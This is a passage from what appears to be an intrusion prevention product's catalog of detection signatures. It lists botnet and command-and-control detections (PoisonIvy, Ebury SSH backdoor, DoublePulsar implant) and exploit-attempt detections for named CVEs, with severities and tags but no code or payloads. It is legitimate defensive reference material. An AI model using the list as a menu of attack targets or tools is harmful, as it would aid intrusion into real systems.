About this situation: SpyBot botnet activity
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Spybot-Botnet
Description:
Back to top

Generic_SS-CA-BrightStor-Arcserve-Backup-Discovery-Service-Buffer-Overflow

About this situation: Buffer overflow exploit against CA BrightStor Arcserve Backup Discovery Service detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor, CVE2006, Windows not specific, Computer Associates BrightStor not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-158-2032
Vulnerability: CA-BrightStor-Arcserve-Backup-Discovery-Service-Hostname-Buffer-Overflow
Description:
Back to top

Generic_SS-Cesanta-Mongoose-Parse_MQTT-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Cesanta Mongoose detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cesanta Mongoose, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Cesanta-Mongoose-Parse_MQTT-Out-Of-Bounds-Read
Description:
Back to top

Generic_SS-Cleartext-SMTP-Commands-After-TLS-Handshake

About this situation: Cleartext SMTP protocol command traffic after TLS handshake detected
Context: TCP Server Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, OpenSSL, GnuTLS, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Description:
Back to top

Generic_SS-CoCSoft-Stream-Down-Buffer-Overflow

About this situation: An attempt to exploit a CoCSoft Stream Down Buffer Overflow vulnerability detected.
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, CoCSoft Stream Down, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Vulnerability: CoCSoft-Stream-Down-Buffer-Overflow
Description:
Back to top

Generic_SS-Colloquy-IRC-Channel-Invite-Format-String-DoS

About this situation: An attempt to exploit a Colloquy IRC Channel Invite Format String DoS vulnerability.
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Colloquy, CVE2007, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-673-5211
Last changed: sgpkg-ips-673-5211
Vulnerability: Colloquy-IRC-Channel-Invite-Format-String-DoS
Description:
Back to top

Generic_SS-Darkshell-Botnet-Activity

About this situation: Darkshell Botnet activity detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Darkshell-Botnet
Description:
Back to top

Generic_SS-DoblePulsar-PeddleCheap-Implant-Traffic

About this situation: Malware C & C traffic
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1019-5242
Last changed: sgpkg-ips-1020-5242
Vulnerability: DoblePulsar-PeddleCheap-Implant-Traffic
Description:
Back to top

Generic_SS-Eaton-VURemote-DoS

About this situation: A vulnerability in Eaton VURemote
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Eaton VURemote, Any Operating System not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Eaton-VURemote-DoS
Description:
Back to top

Generic_SS-Ebury-SSH-Backdoor-Activity

About this situation: Ebury SSH Rootkit backdoor detected
Context: TCP Server Stream Unknown
Severity: 10
Tags: Unix, Linux, Any Hardware, Ebury SSH Rootkit, Unix not specific, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-1728-5242
Description:
Back to top

Generic_SS-ElasticSearch-Throwableobjectinputstream-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Elastic Elasticsearch detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ElasticSearch, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-994-5242
Last changed: sgpkg-ips-1694-5242
Vulnerability: ElasticSearch-Throwableobjectinputstream-Insecure-Deserialization
Description:
Back to top

Generic_SS-FinalDraft-C2-Activity

About this situation: FinalDraft command-and-control traffic detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, FinalDraft, Any Operating System not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Vulnerability: FinalDraft-C2-Activity
Description:
Back to top

Generic_SS-Floodnet-IRC-Activity

About this situation: Detected Floodnet IRC Activity
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Floodnet-IRC-Activity
Description:
Back to top

Generic_SS-Forcepoint-SSLVPN-Authentication-Failure

About this situation: An authentication failure in Forcepoint VPN detected
Context: TCP Server Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Forcepoint VPN, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-1829-5242
Last changed: sgpkg-ips-1829-5242
Vulnerability: Forcepoint-SSLVPN-Password-Brute-Force
Description:
Back to top

Generic_SS-Fynloski-Botnet-Traffic

About this situation: Fynloski botnet traffic detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: Botnet-Fynloski
Description:
Back to top

Generic_SS-Git-Submodules-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in GIT detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Git, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1136-5242
Last changed: sgpkg-ips-1136-5242
Vulnerability: Git-Submodules-Directory-Traversal
Description:
Back to top

Generic_SS-Gt-Bot-Activity

About this situation: GT Bot activity
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Gt-Bot
Description:
Back to top

Generic_SS-HTran-Connection-Bouncer-Error-Message

About this situation: HTran Connection Bouncer Error Message detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: HTran-Connection-Bouncer
Description:
Back to top

Generic_SS-ICONICS-Modbus-DoS

About this situation: A vulnerability in Iconics OPC Modbus Ethernet Server
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Linux, Any Hardware, Modbus SCADA, Windows not specific, Linux not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-613-5211
Vulnerability: ICONICS-Modbus-DoS
Description:
Back to top

Generic_SS-Inductive-Automation-Ignition-OPC-UA-Client-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Inductive Automation Ignition detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Inductive Automation Ignition, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Vulnerability: Inductive-Automation-Ignition-OPC-UA-Client-Cross-Site-Scripting
Description:
Back to top

Generic_SS-Internet-Explorer-HTML-Elements-Buffer-Overflow

About this situation: Attempt to exploit HTML Elements Buffer Overflow in Internet Explorerer detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, MS2004-12, CVE2004, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-925-5242
Vulnerability: MS-Ie-Frame-Iframe-Embed-Tag-Attribute-BOF-MS04-040
Description:
Back to top

Generic_SS-IRC-Scan-Activity

About this situation: Detected IRC SCAN activity
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: IRC-Scan-Activity
Description:
Back to top

Generic_SS-Linux-Kernel-Libceph-Messenger_V2-Segment-Length-Signedness-Error

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Kernel detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, CVE2023, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1652-5242
Last changed: sgpkg-ips-1652-5242
Vulnerability: Linux-Kernel-Libceph-Messenger_V2-Segment-Length-Signedness-Error
Description:
Back to top

Generic_SS-Mcrat-Botnet-Activity

About this situation: McRat Botnet activity detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Mcrat-Botnet
Description:
Back to top

Generic_SS-Memcached-Server-Error-Response

About this situation: A memcached error response was detected
Context: TCP Server Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Memcached, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-522-5211
Vulnerability: Memcached-Usage
Description:
Back to top

Generic_SS-Microsoft-Ie-Body-Element-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer Body Element Use After Free detected.
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-10, CVE2011, Windows not specific, Internet Explorer not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: Microsoft-Internet-Explorer-Option-Element-Use-After-Free
Description:
Back to top

Generic_SS-Microsoft-Internet-Explorer-CVE-2010-3971

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2010, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-399-4219
Last changed: sgpkg-ips-399-4219
Vulnerability: Microsoft-Internet-Explorer-CVE-2010-3971
Description:
Back to top

Generic_SS-Microsoft-Internet-Explorer-CVE-2010-3971-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2010, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-399-4219
Last changed: sgpkg-ips-399-4219
Vulnerability: Microsoft-Internet-Explorer-CVE-2010-3971
Description:
Back to top

Generic_SS-Microsoft-Internet-Explorer-CVE-2010-3971-3

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2010, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-399-4219
Last changed: sgpkg-ips-399-4219
Vulnerability: Microsoft-Internet-Explorer-CVE-2010-3971
Description:
Back to top

Generic_SS-Microsoft-Internet-Explorer-CVE-2010-3971-4

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2010, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-399-4219
Last changed: sgpkg-ips-399-4219
Vulnerability: Microsoft-Internet-Explorer-CVE-2010-3971
Description:
Back to top

Generic_SS-Microsoft-Windows-Credssp-MITM-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Vulnerability: Microsoft-Windows-Credssp-MITM-Code-Execution
Description:
Back to top

Generic_SS-Microsoft-Windows-DHCP-Server-Failover-CVE-2023-38162-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows Server, MS2023-09, CVE2023, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1635-5242
Last changed: sgpkg-ips-1635-5242
Vulnerability: Microsoft-Windows-DHCP-Server-Failover-CVE-2023-38162-Denial-Of-Service
Description:
Back to top

Generic_SS-Microsoft-Windows-KDC-Proxy-KpsSocketRecvDataIoCompletion-Integer-Overflow

About this situation: An authentication failure in Microsoft Windows KDC Proxy detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows KDC Proxy, CVE2024, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Microsoft-Windows-KDC-Proxy-KpsSocketRecvDataIoCompletion-Integer-Overflow
Description:
Back to top

Generic_SS-Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference

About this situation: This fingerprint sets a shared variable
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows Server, MS2013-02, CVE2013, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-511-5211
Last changed: sgpkg-ips-516-5211
Vulnerability: Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference
Description:
Back to top

Generic_SS-MOXA-Device-Manager-Tool-Buffer-Overflow

About this situation: An attempt to exploit a MOXA Device Manager Tool Buffer Overflow vulnerability detected.
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MOXA Device Manager Tool, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-786-5211
Last changed: sgpkg-ips-789-5211
Vulnerability: MOXA-Device-Manager-Tool-Buffer-Overflow
Description:
Back to top

Generic_SS-MS-Forefront-Threat-Management-Gateway-Client-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Forefront Threat Management Gateway Client detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Microsoft Forefront Threat Management Gateway Client, MS2011-06, CVE2011, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: MS-Forefront-Threat-Management-Gateway-Client-Remote-Code-Execution
Description:
Back to top

Generic_SS-Novell-Groupwise-Messenger-HTTP-Response-Handling-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in Novell GroupWise Messenger Client (GWIM) for Windows detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Novell GroupWise Messenger, CVE2008, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1646-5242
Vulnerability: Novell-Groupwise-Messenger-HTTP-Response-Handling-Stack-Overflow
Description:
Back to top

Generic_SS-NOVUS-NConfig-SEH-Buffer-Overflow

About this situation: NOVUS NConfig SEH based buffer overflow vulnerability.
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, NOVUS, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: NOVUS-NConfig-SEH-Buffer-Overflow
Description:
Back to top

Generic_SS-Oracle-WebLogic-Server-Session-Fixation

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Oracle-WebLogic-Server-Session-Fixation
Description:
Back to top

Generic_SS-Phatbot-Trojan-Infection

About this situation: Detected Phatbot Trojan Infection
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Phatbot-Trojan
Description:
Back to top

Generic_SS-PoisonIvy-Activity

About this situation: PoisonIvy activity detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1175-5242
Vulnerability: Botnet-PoisonIvy
Description:
Back to top

Generic_SS-Ponmocup-Activity

About this situation: Ponmocup Activity Detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-625-5211
Vulnerability: Ponmocup
Description:
Back to top

Generic_SS-PostgreSQL-Failed-Login

About this situation: Failed PostgreSQL login
Context: TCP Server Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Failed Login, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Description:
Back to top

Generic_SS-Provectus-UI-For-Apache-Kafka-Jmx-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Provectus UI for Apache Kafka detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Provectus UI for Apache Kafka, CVE2024, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Vulnerability: Provectus-UI-For-Apache-Kafka-Jmx-Insecure-Deserialization
Description:
Back to top

Generic_SS-Quagga-Hello

About this situation: Quagga server hello banner
Context: TCP Server Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Description:
Back to top

Generic_SS-Rdesktop-Process_Redirect_PDU-BSS-Overflow

About this situation: An attempt to exploit a vulnerability in rdesktop detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Unix, Linux, Any Hardware, rdesktop, CVE2008, Unix not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: Rdesktop-Process_Redirect_PDU-BSS-Overflow
Description:
Back to top

Generic_SS-Recslurp-Botnet-Traffic

About this situation: Recslurp botnet traffic detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-756-5211
Vulnerability: Recslurp-Botnet
Description:
Back to top

Generic_SS-SCADA-AspicManager-Denial-Of-Service

About this situation: A vulnerability in SCADA AspicManager allowing denial of service.
Context: TCP Server Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, SCADA AspicManager, Windows not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: SCADA-AspicManager-Denial-Of-Service
Description:
Back to top

Generic_SS-Shared-Variables-Fingerprint

About this situation: This fingerprint sets shared variables
Context: TCP Server Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-399-4219
Last changed: sgpkg-ips-1816-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

Generic_SS-Squid-Gopher-Protocol-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Squid Project Squid Web Proxy Cache detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2005, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-357-4219
Vulnerability: Squid-Gopher-Protocol-Handling-Buffer-Overflow
Description:
Back to top

Generic_SS-Squid-Proxy-Gopher-Response-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Squid detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-421-4219
Vulnerability: Squid-Proxy-Gopher-Response-Processing-Buffer-Overflow
Description:
Back to top

Generic_SS-SSL-Certificate-In-Nonstandard-Port

About this situation: An SSL certificate was detected
Context: TCP Server Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-421-4219
Vulnerability: SSL-Certificate-In-Nonstandard-Port
Description:
Back to top

Generic_SS-Suspicious-Git-Packfile-In-Server-Response

About this situation: A suspicious Git packfile detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Git, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1784-5242
Last changed: sgpkg-ips-1784-5242
Vulnerability: Git-Source-Code-Management-Clone_submodule-Link-Following
Description:
Back to top

Generic_SS-Suspicious-Traffic

About this situation: A suspicious traffic pattern detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

Generic_SS-Symantec-pcAnywhere-Server-Reply

About this situation: Symantec pcAnywhere remote control software usage detected
Context: TCP Server Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, Symantec pcAnywhere, Windows not specific, Remote Control, TCP Server Traffic
First detected in: sgpkg-ips-276-4219
Last changed: sgpkg-ips-424-4219
Vulnerability: Symantec-pcAnywhere-Usage
Description:
Back to top

Generic_SS-Text-File-In-HTTP-0.9-Response

About this situation: HTTP 0.9 Detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-564-5211
Description:
Back to top

Generic_SS-Tofsee-Activity

About this situation: Tofsee activity detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Botnet-Tofsee
Description:
Back to top

Generic_SS-UltraVNC-Client-Buffer-Overflow

About this situation: An attempt to exploit an UltraVNC Client Buffer Overflow vulnerability detected.
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows XP SP3, Any Hardware, UltraVNC, CVE2008, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: UltraVNC-Client-Buffer-Overflow
Description:
Back to top

Generic_SS-Veritas-Storage-Foundation-Scheduler-Service-Null-Session-Bypass

About this situation: An attempt to exploit a vulnerability in Symantec Veritas Storage Foundation for Windows detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Symantec Veritas Storage Foundation, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Symantec-Veritas-Storage-Foundation-Scheduler-Service-Null-Session-Bypass
Description:
Back to top

Generic_SS-Virut-Malware-C2-Traffic

About this situation: Virut malware C2 traffic was detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1096-5242
Vulnerability: Virut-Malware-C2-Traffic
Description:
Back to top

Generic_SS-VLC-Media-Player-RTSP-Plugin-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Live555 liblivemedia detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-560-5211
Vulnerability: VLC-Media-Player-RTSP-Plugin-Stack-Buffer-Overflow
Description:
Back to top

Generic_SS-Vobfus-Botnet-Request

About this situation: A suspicious request have been made
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-556-5211
Vulnerability: Fakerean-Botnet
Description:
Back to top

Generic_SS-W32/Gaobot.worm.gen-Worm-IRC-Activity

About this situation: Detected botnet IRC Activity
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: W32/Gaobot.worm.gen-Worm-IRC-Activity
Description:
Back to top

Generic_SS-W32/Nuwar@mm-Encrypted-Traffic

About this situation: W32/Nuwar@MM Encrypted Traffic detected
Context: TCP Server Stream Unknown
Severity: 7
